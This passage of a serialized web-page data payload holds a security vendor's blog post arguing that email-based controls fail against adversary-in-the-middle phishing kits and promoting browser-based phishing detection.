":51618,"marks":51619,"value":48119,"nodeType":864},{},[51620],{"type":899},{"data":51622,"content":51623,"nodeType":860},{},[51624],{"data":51625,"marks":51626,"value":48126,"nodeType":864},{},[],{"data":51628,"content":51629,"nodeType":860},{},[51630],{"data":51631,"marks":51632,"value":48133,"nodeType":864},{},[],{"data":51634,"content":51635,"nodeType":860},{},[51636],{"data":51637,"marks":51638,"value":48140,"nodeType":864},{},[],{"data":51640,"content":51643,"nodeType":996},{"target":51641},{"sys":51642},{"id":48145,"type":1001,"linkType":1002},[],{"data":51645,"content":51646,"nodeType":860},{},[51647],{"data":51648,"marks":51649,"value":48153,"nodeType":864},{},[],{"data":51651,"content":51652,"nodeType":860},{},[51653],{"data":51654,"marks":51655,"value":48160,"nodeType":864},{},[],{"data":51657,"content":51660,"nodeType":996},{"target":51658},{"sys":51659},{"id":48165,"type":1001,"linkType":1002},[],{"data":51662,"content":51663,"nodeType":860},{},[51664],{"data":51665,"marks":51666,"value":48173,"nodeType":864},{},[],{"data":51668,"content":51669,"nodeType":860},{},[51670,51673,51680],{"data":51671,"marks":51672,"value":48180,"nodeType":864},{},[],{"data":51674,"content":51675,"nodeType":883},{"uri":48183},[51676],{"data":51677,"marks":51678,"value":40631,"nodeType":864},{},[51679],{"type":1455},{"data":51681,"marks":51682,"value":48192,"nodeType":864},{},[],{"data":51684,"content":51687,"nodeType":996},{"target":51685},{"sys":51686},{"id":40094,"type":1001,"linkType":1002},[],{"data":51689,"content":51690,"nodeType":860},{},[51691],{"data":51692,"marks":51693,"value":48204,"nodeType":864},{},[],{"data":51695,"content":51696,"nodeType":1005},{},[],{"data":51698,"content":51699,"nodeType":1009},{},[51700],{"data":51701,"marks":51702,"value":48215,"nodeType":864},{},[51703],{"type":899},{"data":51705,"content":51706,"nodeType":860},{},[51707],{"data":51708,"marks":51709,"value":48222,"nodeType":864},{},[],{"data":51711,"content":51714,"nodeType":996},{"target":51712},{"sys":51713},{"id":48227,"type":1001,"linkType":1002},[],{"data":51716,"content":51717,"nodeType":860},{},[51718],{"data":51719,"marks":51720,"value":48235,"nodeType":864},{},[],{"data":51722,"content":51723,"nodeType":941},{},[51724,51743],{"data":51725,"content":51726,"nodeType":945},{},[51727],{"data":51728,"content":51729,"nodeType":860},{},[51730,51733,51740],{"data":51731,"marks":51732,"value":21,"nodeType":864},{},[],{"data":51734,"content":51735,"nodeType":883},{"uri":48183},[51736],{"data":51737,"marks":51738,"value":48255,"nodeType":864},{},[51739],{"type":1455},{"data":51741,"marks":51742,"value":48259,"nodeType":864},{},[],{"data":51744,"content":51745,"nodeType":945},{},[51746],{"data":51747,"content":51748,"nodeType":860},{},[51749,51752,51759],{"data":51750,"marks":51751,"value":21,"nodeType":864},{},[],{"data":51753,"content":51754,"nodeType":883},{"uri":48271},[51755],{"data":51756,"marks":51757,"value":48277,"nodeType":864},{},[51758],{"type":1455},{"data":51760,"marks":51761,"value":48281,"nodeType":864},{},[],{"data":51763,"content":51766,"nodeType":996},{"target":51764},{"sys":51765},{"id":48286,"type":1001,"linkType":1002},[],{"data":51768,"content":51769,"nodeType":860},{},[51770],{"data":51771,"marks":51772,"value":48294,"nodeType":864},{},[],{"data":51774,"content":51775,"nodeType":1005},{},[],{"data":51777,"content":51778,"nodeType":1009},{},[51779],{"data":51780,"marks":51781,"value":48305,"nodeType":864},{},[51782],{"type":899},{"data":51784,"content":51785,"nodeType":860},{},[51786],{"data":51787,"marks":51788,"value":48312,"nodeType":864},{},[],{"data":51790,"content":51791,"nodeType":860},{},[51792],{"data":51793,"marks":51794,"value":48319,"nodeType":864},{},[],{"data":51796,"content":51799,"nodeType":996},{"target":51797},{"sys":51798},{"id":48324,"type":1001,"linkType":1002},[],{"data":51801,"content":51804,"nodeType":996},{"target":51802},{"sys":51803},{"id":48330,"type":1001,"linkType":1002},[],{"data":51806,"content":51809,"nodeType":996},{"target":51807},{"sys":51808},{"id":48336,"type":1001,"linkType":1002},[],{"data":51811,"content":51812,"nodeType":1005},{},[],{"data":51814,"content":51815,"nodeType":1009},{},[51816],{"data":51817,"marks":51818,"value":48348,"nodeType":864},{},[51819],{"type":899},{"data":51821,"content":51822,"nodeType":860},{},[51823],{"data":51824,"marks":51825,"value":48355,"nodeType":864},{},[],{"data":51827,"content":51830,"nodeType":996},{"target":51828},{"sys":51829},{"id":48360,"type":1001,"linkType":1002},[],{"data":51832,"content":51833,"nodeType":860},{},[51834],{"data":51835,"marks":51836,"value":48368,"nodeType":864},{},[],{"data":51838,"content":51839,"nodeType":860},{},[51840],{"data":51841,"marks":51842,"value":48375,"nodeType":864},{},[],{"data":51844,"content":51845,"nodeType":1005},{},[],{"data":51847,"content":51848,"nodeType":1009},{},[51849],{"data":51850,"marks":51851,"value":40331,"nodeType":864},{},[51852],{"type":899},{"data":51854,"content":51855,"nodeType":860},{},[51856],{"data":51857,"marks":51858,"value":48392,"nodeType":864},{},[],{"data":51860,"content":51861,"nodeType":860},{},[51862,51865,51872],{"data":51863,"marks":51864,"value":40953,"nodeType":864},{},[],{"data":51866,"content":51867,"nodeType":883},{"uri":48401},[51868],{"data":51869,"marks":51870,"value":40352,"nodeType":864},{},[51871],{"type":1455},{"data":51873,"marks":51874,"value":40356,"nodeType":864},{},[],{"items":51876},[51877,51879],{"sys":51878,"name":6593},{"id":6592},{"sys":51880,"name":342},{"id":6596},{"items":51882},[51883],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":51884},{"url":2740},{"__typename":2059,"sys":51886,"content":51888,"title":52505,"synopsis":52506,"hashTags":59,"publishedDate":52507,"slug":52508,"tagsCollection":52509,"authorsCollection":52515},{"id":51887},"4UgGUvlZNqkJtx9nNprKg0",{"json":51889},{"data":51890,"content":51891,"nodeType":856},{},[51892,51899,51929,51935,51942,51945,51953,51960,51967,52000,52007,52014,52021,52024,52032,52051,52058,52065,52071,52078,52085,52088,52096,52103,52110,52116,52123,52143,52176,52183,52186,52194,52201,52208,52214,52221,52228,52235,52240,52247,52253,52260,52263,52271,52278,52285,52288,52296,52303,52310,52317,52320,52328,52335,52342,52349,52356,52363,52368,52375,52382,52387,52394,52427,52434,52446,52466,52472,52475,52482,52488],{"data":51893,"content":51894,"nodeType":860},{},[51895],{"data":51896,"marks":51897,"value":51898,"nodeType":864},{},[],"Most organizations today have invested in an email security solution of some description. But even the most premium tools have significant limitations when it comes to modern phishing attacks. ",{"data":51900,"content":51901,"nodeType":860},{},[51902,51906,51913,51917,51926],{"data":51903,"marks":51904,"value":51905,"nodeType":864},{},[],"The data speaks for itself — phishing remains as big a problem as it ever was (if not bigger!) despite enormous investment in security products and training. In 2024, identity-based attack vectors involving a human element (phishing and stolen credentials) accounted for 80% of the initial access observed by ",{"data":51907,"content":51908,"nodeType":883},{"uri":4408},[51909],{"data":51910,"marks":51911,"value":19595,"nodeType":864},{},[51912],{"type":1455},{"data":51914,"marks":51915,"value":51916,"nodeType":864},{},[],", while 69% of organizations experienced a phishing incident in 2024 according to ",{"data":51918,"content":51920,"nodeType":883},{"uri":51919},"https://www.idsalliance.org/white-paper/2024-trends-in-securing-digital-identities/",[51921],{"data":51922,"marks":51923,"value":51925,"nodeType":864},{},[51924],{"type":1455},"IDSA",{"data":51927,"marks":51928,"value":10094,"nodeType":864},{},[],{"data":51930,"content":51934,"nodeType":996},{"target":51931},{"sys":51932},{"id":51933,"type":1001,"linkType":1002},"4urh9lIuo0ePgVIJZNtP2B",[],{"data":51936,"content":51937,"nodeType":860},{},[51938],{"data":51939,"marks":51940,"value":51941,"nodeType":864},{},[],"So, why are phishing attacks still so effective for attackers? ",{"data":51943,"content":51944,"nodeType":1005},{},[],{"data":51946,"content":51947,"nodeType":1009},{},[51948],{"data":51949,"marks":51950,"value":51952,"nodeType":864},{},[51951],{"type":899},"Modern phishing attacks are evading established controls",{"data":51954,"content":51955,"nodeType":860},{},[51956],{"data":51957,"marks":51958,"value":51959,"nodeType":864},{},[],"Let’s start with the lay of the land: What controls and capabilities do organizations typically rely on when it comes to blocking credential phishing?  ",{"data":51961,"content":51962,"nodeType":860},{},[51963],{"data":51964,"marks":51965,"value":51966,"nodeType":864},{},[],"If you’re using an email security solution, you’re relying on the following core capabilities when it comes to detecting malicious phishing pages:",{"data":51968,"content":51969,"nodeType":941},{},[51970,51985],{"data":51971,"content":51972,"nodeType":945},{},[51973],{"data":51974,"content":51975,"nodeType":860},{},[51976,51981],{"data":51977,"marks":51978,"value":51980,"nodeType":864},{},[51979],{"type":899},"Known-bad blocklists:",{"data":51982,"marks":51983,"value":51984,"nodeType":864},{},[]," Block users from accessing known-bad or unapproved domains/URLs, and block traffic from known-bad malicious IPs, using Threat Intelligence (TI) feeds.",{"data":51986,"content":51987,"nodeType":945},{},[51988],{"data":51989,"content":51990,"nodeType":860},{},[51991,51996],{"data":51992,"marks":51993,"value":51995,"nodeType":864},{},[51994],{"type":899},"Malicious webpage detection:",{"data":51997,"marks":51998,"value":51999,"nodeType":864},{},[]," Inspect webpages by loading them in a sandbox to detect malicious elements.",{"data":52001,"content":52002,"nodeType":860},{},[52003],{"data":52004,"marks":52005,"value":52006,"nodeType":864},{},[],"This also applies to other solutions that rely on these capabilities, such as web-based content filtering (e.g. Google Safe Browsing), CASB, SASE, SWG, etc. ",{"data":52008,"content":52009,"nodeType":860},{},[52010],{"data":52011,"marks":52012,"value":52013,"nodeType":864},{},[],"But, attackers are now using specific tactics, techniques, procedures (TTPs) and tooling designed to defeat these solutions. ",{"data":52015,"content":52016,"nodeType":860},{},[52017],{"data":52018,"marks":52019,"value":52020,"nodeType":864},{},[],"Let’s look at where these controls are falling short. ",{"data":52022,"content":52023,"nodeType":1005},{},[],{"data":52025,"content":52026,"nodeType":1009},{},[52027],{"data":52028,"marks":52029,"value":52031,"nodeType":864},{},[52030],{"type":899},"Attackers are innovating with new tooling and techniques",{"data":52033,"content":52034,"nodeType":860},{},[52035,52039,52048],{"data":52036,"marks":52037,"value":52038,"nodeType":864},{},[],"The vast majority of phishing attacks today are executed using ",{"data":52040,"content":52042,"nodeType":883},{"uri":52041},"https://pushsecurity.com/blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm/?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[52043],{"data":52044,"marks":52045,"value":52047,"nodeType":864},{},[52046],{"type":1455},"AitM phishing kits — otherwise known as “MFA bypass” kits",{"data":52049,"marks":52050,"value":2924,"nodeType":864},{},[],{"data":52052,"content":52053,"nodeType":860},{},[52054],{"data":52055,"marks":52056,"value":52057,"nodeType":864},{},[],"These kits use dedicated tooling to act as a proxy between the target and a legitimate login portal for an application. This allows the target to log in successfully with a legitimate service they use and even continue to interact with it. ",{"data":52059,"content":52060,"nodeType":860},{},[52061],{"data":52062,"marks":52063,"value":52064,"nodeType":864},{},[],"As it’s a proxy to the real application, the page will appear exactly as the user expects, because they are logging into the legitimate site – just taking a detour via the attacker’s device. However, because the attacker is sitting in the middle of this connection, they are able to observe all interactions, intercept authentication material like credentials, MFA codes, and session tokens to take control of the authenticated session and gain control of the user account. ",{"data":52066,"content":52070,"nodeType":996},{"target":52067},{"sys":52068},{"id":52069,"type":1001,"linkType":1002},"3ZAawfzPVfhb8cmvWNZEVK",[],{"data":52072,"content":52073,"nodeType":860},{},[52074],{"data":52075,"marks":52076,"value":52077,"nodeType":864},{},[],"MFA was once widely regarded as the silver bullet for phishing (we all remember the Microsoft stat “MFA prevents over 99% of identity-based attacks”) but this is no longer the case. ",{"data":52079,"content":52080,"nodeType":860},{},[52081],{"data":52082,"marks":52083,"value":52084,"nodeType":864},{},[],"Not only are these kits incredibly effective at bypassing other anti-phishing controls like MFA, attackers are building them specifically to evade common detection tooling and techniques. ",{"data":52086,"content":52087,"nodeType":1005},{},[],{"data":52089,"content":52090,"nodeType":1312},{},[52091],{"data":52092,"marks":52093,"value":52095,"nodeType":864},{},[52094],{"type":899},"Known-bad blocklists can’t keep up",{"data":52097,"content":52098,"nodeType":860},{},[52099],{"data":52100,"marks":52101,"value":52102,"nodeType":864},{},[],"The fundamental limitation with known-bad blocklists is that they focus on indicators that are easy for attackers to change, in turn making detections based on them easy to bypass. ",{"data":52104,"content":52105,"nodeType":860},{},[52106],{"data":52107,"marks":52108,"value":52109,"nodeType":864},{},[],"Attackers have gotten pretty good at disguising and rotating these elements. In modern phishing attacks, every target can receive a unique email and link. Even just using a URL shortener can bypass this. It’s equivalent to a malware hash – trivial to change, and therefore not a great thing to pin your detections on. The kind of detection that sits right at the bottom of the Pyramid of Pain. ",{"data":52111,"content":52115,"nodeType":996},{"target":52112},{"sys":52113},{"id":52114,"type":1001,"linkType":1002},"6cG2fx3AikwptyEyXKrYCK",[],{"data":52117,"content":52118,"nodeType":860},{},[52119],{"data":52120,"marks":52121,"value":52122,"nodeType":864},{},[],"You could look at which IP address the user connects to, but these days it’s very simple for attackers to add a new IP to their cloud-hosted server. If a domain is flagged as known-bad, the attacker only has to register a new domain, or compromise a WordPress server on an already trusted domain. Both of these things are happening on a massive scale as attackers pre-plan for the fact that their domains will be burned at some point. Attackers are more than happy to spend $10-$20 per new domain in the grand scheme of the potential proceeds of crime. ",{"data":52124,"content":52125,"nodeType":860},{},[52126,52130,52139],{"data":52127,"marks":52128,"value":52129,"nodeType":864},{},[],"For example, ",{"data":52131,"content":52133,"nodeType":883},{"uri":52132},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection/?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[52134],{"data":52135,"marks":52136,"value":52138,"nodeType":864},{},[52137],{"type":1455},"recent examples of Adversary-in-the-Middle phishing kits",{"data":52140,"marks":52141,"value":52142,"nodeType":864},{},[]," including Tycoon, Nakedpages, Evilginx were seen to rotate the URLs they resolve to (from a continually refreshed pool of URLs), mask the HTTP Referer header to disguise suspicious redirects, and redirect to benign (legitimate) domains if anyone but the intended victims attempted to visit the page. ",{"data":52144,"content":52145,"nodeType":860},{},[52146,52150,52159,52163,52172],{"data":52147,"marks":52148,"value":52149,"nodeType":864},{},[],"And in many cases, attackers are ",{"data":52151,"content":52153,"nodeType":883},{"uri":52152},"https://www.bleepingcomputer.com/news/security/campaign-abusing-hubspot-targets-20-000-microsoft-azure-accounts/",[52154],{"data":52155,"marks":52156,"value":52158,"nodeType":864},{},[52157],{"type":1455},"leveraging legitimate SaaS services",{"data":52160,"marks":52161,"value":52162,"nodeType":864},{},[]," to conduct their campaigns (",{"data":52164,"content":52166,"nodeType":883},{"uri":52165},"https://www.bleepingcomputer.com/news/security/proofpoint-settings-exploited-to-send-millions-of-phishing-emails-daily/",[52167],{"data":52168,"marks":52169,"value":52171,"nodeType":864},{},[52170],{"type":1455},"sometimes even using email protection services themselves!",{"data":52173,"marks":52174,"value":52175,"nodeType":864},{},[],") making it even harder to filter genuine from harmful links. ",{"data":52177,"content":52178,"nodeType":860},{},[52179],{"data":52180,"marks":52181,"value":52182,"nodeType":864},{},[],"But there’s a bigger issue here – for defenders to know that a URL, IP, or domain name is bad, it needs to be reported first. When are things reported? Typically after being used in an attack — so unfortunately, someone always gets hurt. ",{"data":52184,"content":52185,"nodeType":1005},{},[],{"data":52187,"content":52188,"nodeType":1312},{},[52189],{"data":52190,"marks":52191,"value":52193,"nodeType":864},{},[52192],{"type":899},"Malicious webpage detections are failing",{"data":52195,"content":52196,"nodeType":860},{},[52197],{"data":52198,"marks":52199,"value":52200,"nodeType":864},{},[],"Attackers are using various tricks to prevent security tools and bots from reaching their phishing pages to analyse them. ",{"data":52202,"content":52203,"nodeType":860},{},[52204],{"data":52205,"marks":52206,"value":52207,"nodeType":864},{},[],"Using legitimate services to host their domains is increasingly common, with services like Cloudflare Workers used for the initial gateway, and Cloudflare Turnstile to prevent security bots from advancing to the page. ",{"data":52209,"content":52213,"nodeType":996},{"target":52210},{"sys":52211},{"id":52212,"type":1001,"linkType":1002},"4XNxLbiZf3xUK1WeFDjjxl",[],{"data":52215,"content":52216,"nodeType":860},{},[52217],{"data":52218,"marks":52219,"value":52220,"nodeType":864},{},[],"Even if you can get past Turnstile, then you’ll need to supply the correct URL parameters and headers, and execute JavaScript, to be served the malicious page. This means that a defender who knows the domain name can’t discover the malicious behavior just by making a simple HTTP(S) request to the domain.",{"data":52222,"content":52223,"nodeType":860},{},[52224],{"data":52225,"marks":52226,"value":52227,"nodeType":864},{},[],"And if all this wasn’t enough, they’re also obfuscating both visual and DOM elements to prevent signature-based detections from picking them up — so even if you can land on the page, there’s a high chance that your detections won’t trigger. ",{"data":52229,"content":52230,"nodeType":860},{},[52231],{"data":52232,"marks":52233,"value":52234,"nodeType":864},{},[],"By changing the DOM structure, attackers are loading functionally equivalent pages that look very different under the hood.",{"data":52236,"content":52239,"nodeType":996},{"target":52237},{"sys":52238},{"id":48286,"type":1001,"linkType":1002},[],{"data":52241,"content":52242,"nodeType":860},{},[52243],{"data":52244,"marks":52245,"value":52246,"nodeType":864},{},[],"They’re also randomizing page titles, dynamically decoding text, changing the size and name of image elements, using different favicons, blurring backgrounds, substituting logos, and more… all to defeat common detections. ",{"data":52248,"content":52252,"nodeType":996},{"target":52249},{"sys":52250},{"id":52251,"type":1001,"linkType":1002},"3hlzM3qIqaZHy3qxtnRS5x",[],{"data":52254,"content":52255,"nodeType":860},{},[52256],{"data":52257,"marks":52258,"value":52259,"nodeType":864},{},[],"With all this, it’s no surprise that defenders can’t keep up. ",{"data":52261,"content":52262,"nodeType":1005},{},[],{"data":52264,"content":52265,"nodeType":1009},{},[52266],{"data":52267,"marks":52268,"value":52270,"nodeType":864},{},[52269],{"type":899},"The verdict",{"data":52272,"content":52273,"nodeType":860},{},[52274],{"data":52275,"marks":52276,"value":52277,"nodeType":864},{},[],"Historically, the industry has seen email security solutions and anti-phishing as the same thing. But it’s clear that email-based phishing protection isn’t really cutting it when it comes to modern credential phishing attacks (the most common and impactful phishing variant today). ",{"data":52279,"content":52280,"nodeType":860},{},[52281],{"data":52282,"marks":52283,"value":52284,"nodeType":864},{},[],"This isn’t to say that email-based solutions have no value — far from it. But relying on email scanners to detect phishing pages as a single line of defense isn’t enough anymore. ",{"data":52286,"content":52287,"nodeType":1005},{},[],{"data":52289,"content":52290,"nodeType":1009},{},[52291],{"data":52292,"marks":52293,"value":52295,"nodeType":864},{},[52294],{"type":899},"Building better phishing controls",{"data":52297,"content":52298,"nodeType":860},{},[52299],{"data":52300,"marks":52301,"value":52302,"nodeType":864},{},[],"The key to solving this problem is, put simply, building better controls. But to do this, we need to move away from email as being the primary (or often the only) place where phishing attacks can be stopped. ",{"data":52304,"content":52305,"nodeType":860},{},[52306],{"data":52307,"marks":52308,"value":52309,"nodeType":864},{},[],"While email is the main delivery vector for phishing attacks (at least, according to the data we have, which comes primarily from email security solutions) it’s not the only one. Phishing links are increasingly delivered to victims over IM platforms, social media — and generally over the internet. ",{"data":52311,"content":52312,"nodeType":860},{},[52313],{"data":52314,"marks":52315,"value":52316,"nodeType":864},{},[],"A better solution to the problem would therefore be able to follow the user across the sites they use, and see the actual phishing pages as the user sees them, as opposed to a sandbox (which, as we’ve discussed, attackers are well prepared for). ",{"data":52318,"content":52319,"nodeType":1005},{},[],{"data":52321,"content":52322,"nodeType":1312},{},[52323],{"data":52324,"marks":52325,"value":52327,"nodeType":864},{},[52326],{"type":899},"Is browser-based phishing protection the solution?",{"data":52329,"content":52330,"nodeType":860},{},[52331],{"data":52332,"marks":52333,"value":52334,"nodeType":864},{},[],"While we’ve been conditioned to think about phishing as something that happens over email, it’s actually the browser where most of the action happens, regardless of the initial delivery channel.",{"data":52336,"content":52337,"nodeType":860},{},[52338],{"data":52339,"marks":52340,"value":52341,"nodeType":864},{},[],"And while it’s tempting to view the delivery of a phishing link as the attack itself, the phish can’t succeed unless the victim enters their genuine credentials on the malicious page. ",{"data":52343,"content":52344,"nodeType":860},{},[52345],{"data":52346,"marks":52347,"value":52348,"nodeType":864},{},[],"Push provides a browser-based identity security solution that stops phishing attacks where they happen — in employee browsers. ",{"data":52350,"content":52351,"nodeType":860},{},[52352],{"data":52353,"marks":52354,"value":52355,"nodeType":864},{},[],"Being in the browser delivers a lot of advantages when it comes to detecting and intercepting phishing attacks. You see the live webpage that the user sees, meaning you have much better visibility of malicious elements running on the page. It also means that you can implement real-time controls that kick in when a malicious element is detected. ",{"data":52357,"content":52358,"nodeType":860},{},[52359],{"data":52360,"marks":52361,"value":52362,"nodeType":864},{},[],"There’s a clear difference when you compare a phishing attack with and without Push. ",{"data":52364,"content":52367,"nodeType":996},{"target":52365},{"sys":52366},{"id":48736,"type":1001,"linkType":1002},[],{"data":52369,"content":52370,"nodeType":860},{},[52371],{"data":52372,"marks":52373,"value":52374,"nodeType":864},{},[],"Here, an attacker hacks a WordPress blog to get a reputable domain and then runs a phishing toolkit on the webpage. They email one of your employees a link to it. Your SWG or email scanning solution inspects it in a sandbox but the phish kit detects this and redirects to a benign site so that it passes the inspection. ",{"data":52376,"content":52377,"nodeType":860},{},[52378],{"data":52379,"marks":52380,"value":52381,"nodeType":864},{},[],"Your user gets the email with the link and is now free to interact with the phishing page. They enter their credentials plus MFA code into the page and voila! The attacker steals the authenticated session and takes over the user’s account.  ",{"data":52383,"content":52386,"nodeType":996},{"target":52384},{"sys":52385},{"id":48772,"type":1001,"linkType":1002},[],{"data":52388,"content":52389,"nodeType":860},{},[52390],{"data":52391,"marks":52392,"value":52393,"nodeType":864},{},[],"But with Push, our browser extension inspects the webpage running in the user's browser. Push observes that the webpage is a login page and the user is entering their password into the page, detecting that:",{"data":52395,"content":52396,"nodeType":941},{},[52397,52407,52417],{"data":52398,"content":52399,"nodeType":945},{},[52400],{"data":52401,"content":52402,"nodeType":860},{},[52403],{"data":52404,"marks":52405,"value":52406,"nodeType":864},{},[],"The password the user is entering matches the domain that password is pinned to. Since it doesn't match, based on this detection alone the user is automatically redirected to a blocking page. ",{"data":52408,"content":52409,"nodeType":945},{},[52410],{"data":52411,"content":52412,"nodeType":860},{},[52413],{"data":52414,"marks":52415,"value":52416,"nodeType":864},{},[],"The rendered web app is using a cloned app login page.",{"data":52418,"content":52419,"nodeType":945},{},[52420],{"data":52421,"content":52422,"nodeType":860},{},[52423],{"data":52424,"marks":52425,"value":52426,"nodeType":864},{},[],"A phishing toolkit is running on the web page. ",{"data":52428,"content":52429,"nodeType":860},{},[52430],{"data":52431,"marks":52432,"value":52433,"nodeType":864},{},[],"As a result, the user is blocked from interacting with the phishing site and prevented from continuing. ",{"data":52435,"content":52436,"nodeType":860},{},[52437,52441],{"data":52438,"marks":52439,"value":52440,"nodeType":864},{},[],"These are good examples of detections that are difficult (or impossible) for an attacker to evade — ",{"data":52442,"marks":52443,"value":52445,"nodeType":864},{},[52444],{"type":899},"you can’t phish a victim if they can’t enter their credentials into your phishing site! ",{"data":52447,"content":52448,"nodeType":860},{},[52449,52453,52462],{"data":52450,"marks":52451,"value":52452,"nodeType":864},{},[],"If we look at the Pyramid of Pain again, we can see that these are much harder detections for attackers to get around, ",{"data":52454,"content":52456,"nodeType":883},{"uri":52455},"https://pushsecurity.com/blog/shifting-detection-left-for-more-effective-itdr/?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[52457],{"data":52458,"marks":52459,"value":52461,"nodeType":864},{},[52460],{"type":1455},"enabling earlier detection and interception of account takeover ",{"data":52463,"marks":52464,"value":52465,"nodeType":864},{},[],"when compared to static, TI-driven blocklists — stopping attacks before anyone gets hurt.",{"data":52467,"content":52471,"nodeType":996},{"target":52468},{"sys":52469},{"id":52470,"type":1001,"linkType":1002},"6q8H7vA8k7mLrSsr5R0TZ1",[],{"data":52473,"content":52474,"nodeType":1005},{},[],{"data":52476,"content":52477,"nodeType":1009},{},[52478],{"data":52479,"marks":52480,"value":40331,"nodeType":864},{},[52481],{"type":899},{"data":52483,"content":52484,"nodeType":860},{},[52485],{"data":52486,"marks":52487,"value":48392,"nodeType":864},{},[],{"data":52489,"content":52490,"nodeType":860},{},[52491,52494,52501],{"data":52492,"marks":52493,"value":40953,"nodeType":864},{},[],{"data":52495,"content":52496,"nodeType":883},{"uri":48401},[52497],{"data":52498,"marks":52499,"value":40352,"nodeType":864},{},[52500],{"type":1455},{"data":52502,"marks":52503,"value":52504,"nodeType":864},{},[]," for a live demo. ","Why it's time for phishing prevention to move beyond email","Modern MFA-bypass phishing attacks are routinely defeating primarily email-based security controls. Why are controls failing and what can we do about it? ","2025-03-20T00:00:00.000Z","why-its-time-for-phishing-prevention-to-move-beyond-email",{"items":52510},[52511,52513],{"sys":52512,"name":6593},{"id":6592},{"sys":52514,"name":342},{"id":6596},{"items":52516},[52517],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":52518},{"url":2740},{"__typename":2059,"sys":52520,"content":52521,"title":48848,"synopsis":48849,"hashTags":59,"publishedDate":48850,"slug":48851,"tagsCollection":52795,"authorsCollection":52801},{"id":48534},{"json":52522},{"data":52523,"content":52524,"nodeType":856},{},[52525,52531,52547,52560,52566,52572,52575,52581,52587,52635,52641,52646,52649,52655,52661,52667,52673,52679,52693,52698,52704,52710,52724,52729,52735,52741,52747,52753,52759,52762,52768,52784,52789],{"data":52526,"content":52527,"nodeType":1009},{},[52528],{"data":52529,"marks":52530,"value":48545,"nodeType":864},{},[],{"data":52532,"content":52533,"nodeType":860},{},[52534,52537,52544],{"data":52535,"marks":52536,"value":48552,"nodeType":864},{},[],{"data":52538,"content":52539,"nodeType":883},{"uri":7425},[52540],{"data":52541,"marks":52542,"value":48560,"nodeType":864},{},[52543],{"type":1455},{"data":52545,"marks":52546,"value":10094,"nodeType":864},{},[],{"data":52548,"content":52549,"nodeType":860},{},[52550,52553,52557],{"data":52551,"marks":52552,"value":48570,"nodeType":864},{},[],{"data":52554,"marks":52555,"value":48575,"nodeType":864},{},[52556],{"type":1455},{"data":52558,"marks":52559,"value":48579,"nodeType":864},{},[],{"data":52561,"content":52562,"nodeType":860},{},[52563],{"data":52564,"marks":52565,"value":48586,"nodeType":864},{},[],{"data":52567,"content":52568,"nodeType":860},{},[52569],{"data":52570,"marks":52571,"value":48593,"nodeType":864},{},[],{"data":52573,"content":52574,"nodeType":1005},{},[],{"data":52576,"content":52577,"nodeType":1312},{},[52578],{"data":52579,"marks":52580,"value":48603,"nodeType":864},{},[],{"data":52582,"content":52583,"nodeType":860},{},[52584],{"data":52585,"marks":52586,"value":48610,"nodeType":864},{},[],{"data":52588,"content":52589,"nodeType":941},{},[52590,52599,52608,52617,52626],{"data":52591,"content":52592,"nodeType":945},{},[52593],{"data":52594,"content":52595,"nodeType":860},{},[52596],{"data":52597,"marks":52598,"value":48623,"nodeType":864},{},[],{"data":52600,"content":52601,"nodeType":945},{},[52602],{"data":52603,"content":52604,"nodeType":860},{},[52605],{"data":52606,"marks":52607,"value":48633,"nodeType":864},{},[],{"data":52609,"content":52610,"nodeType":945},{},[52611],{"data":52612,"content":52613,"nodeType":860},{},[52614],{"data":52615,"marks":52616,"value":48643,"nodeType":864},{},[],{"data":52618,"content":52619,"nodeType":945},{},[52620],{"data":52621,"content":52622,"nodeType":860},{},[52623],{"data":52624,"marks":52625,"value":48653,"nodeType":864},{},[],{"data":52627,"content":52628,"nodeType":945},{},[52629],{"data":52630,"content":52631,"nodeType":860},{},[52632],{"data":52633,"marks":52634,"value":48663,"nodeType":864},{},[],{"data":52636,"content":52637,"nodeType":860},{},[52638],{"data":52639,"marks":52640,"value":48670,"nodeType":864},{},[],{"data":52642,"content":52645,"nodeType":996},{"target":52643},{"sys":52644},{"id":48675,"type":1001,"linkType":1002},[],{"data":52647,"content":52648,"nodeType":1005},{},[],{"data":52650,"content":52651,"nodeType":1312},{},[52652],{"data":52653,"marks":52654,"value":48686,"nodeType":864},{},[],{"data":52656,"content":52657,"nodeType":860},{},[52658],{"data":52659,"marks":52660,"value":48693,"nodeType":864},{},[],{"data":52662,"content":52663,"nodeType":860},{},[52664],{"data":52665,"marks":52666,"value":48700,"nodeType":864},{},[],{"data":52668,"content":52669,"nodeType":860},{},[52670],{"data":52671,"marks":52672,"value":48707,"nodeType":864},{},[],{"data":52674,"content":52675,"nodeType":860},{},[52676],{"data":52677,"marks":52678,"value":48714,"nodeType":864},{},[],{"data":52680,"content":52681,"nodeType":1312},{},[52682,52685,52690],{"data":52683,"marks":52684,"value":48721,"nodeType":864},{},[],{"data":52686,"marks":52687,"value":48727,"nodeType":864},{},[52688,52689],{"type":1455},{"type":899},{"data":52691,"marks":52692,"value":48731,"nodeType":864},{},[],{"data":52694,"content":52697,"nodeType":996},{"target":52695},{"sys":52696},{"id":48736,"type":1001,"linkType":1002},[],{"data":52699,"content":52700,"nodeType":860},{},[52701],{"data":52702,"marks":52703,"value":48744,"nodeType":864},{},[],{"data":52705,"content":52706,"nodeType":860},{},[52707],{"data":52708,"marks":52709,"value":48751,"nodeType":864},{},[],{"data":52711,"content":52712,"nodeType":1312},{},[52713,52716,52721],{"data":52714,"marks":52715,"value":48758,"nodeType":864},{},[],{"data":52717,"marks":52718,"value":3053,"nodeType":864},{},[52719,52720],{"type":1455},{"type":899},{"data":52722,"marks":52723,"value":48767,"nodeType":864},{},[],{"data":52725,"content":52728,"nodeType":996},{"target":52726},{"sys":52727},{"id":48772,"type":1001,"linkType":1002},[],{"data":52730,"content":52731,"nodeType":860},{},[52732],{"data":52733,"marks":52734,"value":48780,"nodeType":864},{},[],{"data":52736,"content":52737,"nodeType":860},{},[52738],{"data":52739,"marks":52740,"value":48787,"nodeType":864},{},[